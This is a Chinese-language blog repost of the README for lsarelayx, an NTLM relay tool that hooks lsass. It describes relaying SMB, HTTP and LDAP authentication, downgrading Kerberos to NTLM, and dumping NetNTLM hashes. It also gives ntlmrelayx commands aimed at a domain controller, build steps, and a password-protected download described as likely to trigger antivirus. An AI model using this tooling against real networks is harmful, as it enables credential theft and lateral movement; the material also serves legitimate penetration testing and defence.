lsarelayx NTLM中继攻击|横向渗透工具

lsarelayx NTLM中继攻击|横向渗透工具

lsarelayx简介

lsarelayx 是系统范围的 NTLM 中继工具,旨在将传入的基于 NTLM 的身份验证中继到运行它的主机。lsarelayx 将中继任何传入的身份验证请求,其中包括 SMB。由于 lsarelayx 挂钩到现有的应用程序身份验证流,该工具还将在中继完成后尝试为原始身份验证请求提供服务。这将防止目标应用程序/协议显示错误,并为最终用户针对 lsarelayx 主机进行身份验证正常工作。

特征

  • 在系统范围内中继 NTLM 连接,包括 SMB、HTTP/HTTPS、LDAP/LDAPS 或任何其他实现 Windows 身份验证 API 的第三方应用程序。
  • 在可能的情况下,将传入的 Kerberos 身份验证请求降级为 NTLM。这将导致传统上尝试 Kerberos 身份验证的客户端回退到 NTLM。
  • 为中继用户执行 LDAP 查询以获取组成员身份信息并为原始请求创建正确的身份验证令牌。
  • 转储 NetNTLM 消息以供离线破解。
  • 支持不中继且仅转储捕获的 NetNTLM 哈希的被动模式(在此模式下没有 Kerberos 降级)。
lsarelayx NTLM中继攻击|横向渗透工具

工作原理

lsarelayx 分为三个部分。在 liblsarelay.dll 中实现的虚假 LSA 身份验证提供程序、作为控制接口的用户模式控制台应用程序和名为 RAW 的新 ntlmrelayx 服务器模块。

liblsarelayx.dll

liblsarelayx.dll 是由 lsarelayx 加载的 LSA 身份验证提供程序。它的主要目的是挂钩 NTLM 和 Negotiate 包,以便通过本地命名管道将身份验证请求重定向到 lsarelayx,以便中继和转储 NetNTLM 哈希。liblsarelayx 被设计得尽可能简单,其中所有繁重的工作都由 lsarelayx 执行

lsarelayx.exe

lsarelayx.exe 是主控制台应用程序,用于加载自定义 LSA 身份验证提供程序 (liblsarelayx.dll),侦听来自身份验证提供程序的传入 NTLM 和协商令牌,并中继到 ntlmrelayx 的 RAW 服务器模块。该工具还执行 LDAP 查询,用于捕获中继用户的组信息并将其传递回 LSA 身份验证提供程序。

RAW ntlmrelayx 模块

impacket 的 ntlmrelayx 已经实施了大量创建中继攻击的工作,并将在未来继续改进和增加进一步的攻击。为了利用这一优势直接在 lsarelayx 中重新实施攻击,创建了一个名为 RAW 的新 ntlmrelayx 服务器模块。目前在 GitHub 上有一个实现 RAW 服务器模块的PR。RAW 服务器模块与协议无关,旨在直接接受来自 lsarelayx 等 3rd 方软件的原始 NTLM 消息。

直到 PR 合并到主线 impacket repo 中,您才能使用此版本

用法

主动模式

首先启动ntmlrelayx RAW 服务器模块,监听从lsarelayx 传递过来的RAW NTLM 消息。

python examples\ntlmrelayx.py -smb2support --no-wcf-server --no-smb-server --no-http-server "-t" smb://dc.victim.lan

Impacket v0.9.24.dev1+20211015.125134.c0ec6102 - Copyright 2021 SecureAuth Corporation

[*] Protocol Client DCSYNC loaded..
[*] Protocol Client HTTPS loaded..
[*] Protocol Client HTTP loaded..
[*] Protocol Client IMAP loaded..
[*] Protocol Client IMAPS loaded..
[*] Protocol Client LDAP loaded..
[*] Protocol Client LDAPS loaded..
[*] Protocol Client MSSQL loaded..
[*] Protocol Client RPC loaded..
[*] Protocol Client SMB loaded..
[*] Protocol Client SMTP loaded..
[*] Running in relay mode to single host
[*] Setting up RAW Server on port 6666

[*] Servers started, waiting for connections

lsarelayx 本身需要本地管理员权限才能运行。要在主动中继模式下运行,需要指定 ntlmrelayx 运行原始服务器模块的主机地址。默认端口是 6666。这可以用--port参数覆盖,但请确保也使用--raw-port参数覆盖了 ntlmrelayx 端的端口。

lsarelayx.exe --host 192.168.1.1
[+] Using 192.168.1.1:6666 for relaying NTLM connections
[=] Attempting to load LSA plugin C:\users\Administrator\Desktop\liblsarelayx.dll

被动模式

您还可以通过不带任何参数运行以被动模式运行 lsarelayx

lsarelayx.exe
[=] No host supplied, switching to passive mode
[=] Attempting to load LSA plugin C:\users\Administrator\Desktop\liblsarelayx.dll

注意事项

一旦将 liblsarelayx DLL 加载到 lsass 中,由于 LSA 插件工作方式的限制,目前您无法卸载它。可以关闭客户端,这将使 DLL 进入休眠状态,直到客户端再次启动,但 DLL 将一直使用,直到发生重新启动。

由于 LSA 插件实际上不是真正的插件,因此计划在插件内部实现反射加载器,然后可以随意停止和启动,但这是另一天的练习。

开发是在 Windows 10 和 Server 2016 上进行的。在 Windows Server 2012 R2 上进行了快速测试,该测试有效,但挂钩偏移的计算可能会在 2012 上失败(这可以使用 手动提供lookuppackage-hint=,如果出错,Windows 将重新启动)。没有在桌面端 Windows 10 以下的任何东西上进行过测试,也没有在 Server 2019 上进行过任何测试。

警告

liblsarelayx.dll 将被加载到关键的 lsass.exe 进程中。如果 liblsarelayx.dll 有任何导致 lsass.exe 崩溃的错误,主机将在 60 秒后重新启动。尽管已尽最大努力编写无错误代码,但我不能保证任何事情。不要向我哭诉您在使用 lsarelayx 后因为繁忙的文件服务器崩溃而关闭了您的财富 500 强客户端。

安装方法

Docker

如果您安装了 docker,这是最快的选择。它利用ccob/windows_cross预安装了所有构建依赖项的映像。

Windows 上的 Docker (Powershell)

docker run --rm -it -v $env:pwd\:/root/lsarelayx ccob/windows_cross:latest /bin/bash -c "cd /root/lsarelayx; mkdir build; cd build; cmake -DCMAKE_INSTALL_PREFIX=/root/lsarelayx/dist -DCMAKE_BUILD_TYPE=MinSizeRel -DCMAKE_TOOLCHAIN_FILE=../toolchain/Linux-mingw64.cmake ..; --build . --target install/strip"

Linux 上的 Docker

docker run --rm -it -v $(pwd):/root/lsarelayx ccob/windows_cross:latest /bin/bash -c "cd /root/lsarelayx; mkdir build; cd build; cmake -DCMAKE_INSTALL_PREFIX=/root/lsarelayx/dist -DCMAKE_BUILD_TYPE=MinSizeRel -DCMAKE_TOOLCHAIN_FILE=../toolchain/Linux-mingw64.cmake ..; cmake --build . --target install/strip"

Linux

在 Linux 上,我们使用 CMake 工具链和 MinGW 编译器。这些需要事先安装。对于托管组件,请确保也从 .NET core 安装了 dotnet 命令行工具

mkdir build
cd build
cmake -DCMAKE_INSTALL_PREFIX=$PWD/dist -DCMAKE_BUILD_TYPE=MinSizeRel -DCMAKE_TOOLCHAIN_FILE=../toolchain/Linux-mingw64.cmake ..
cmake --build . --target install/strip

Windows (Powershell)

在尝试构建之前,Windows 将需要完整的 CMake、MinGW 和 Visual Studio 设置,如果您没有安装开发环境,这是最痛苦的构建方式

mkdir build
cd build
cmake -DCMAKE_INSTALL_PREFIX=$PWD/dist -DCMAKE_BUILD_TYPE=MinSizeRel -G "MinGW Makefiles" ..
cmake --build . --target install/strip

项目地址

GitHub: https://github.com/CCob/lsarelayx

下载地址

工具可能报毒,已设置密码

①GitHub:

lsarelayx_0.1_ALPHA.zip

②云中转网盘:

https://yzzpan.com/#sharefile=xq1mYPLe_19076
解压密码:www.ddosi.org

Leave a Reply

您的电子邮箱地址不会被公开。 必填项已用*标注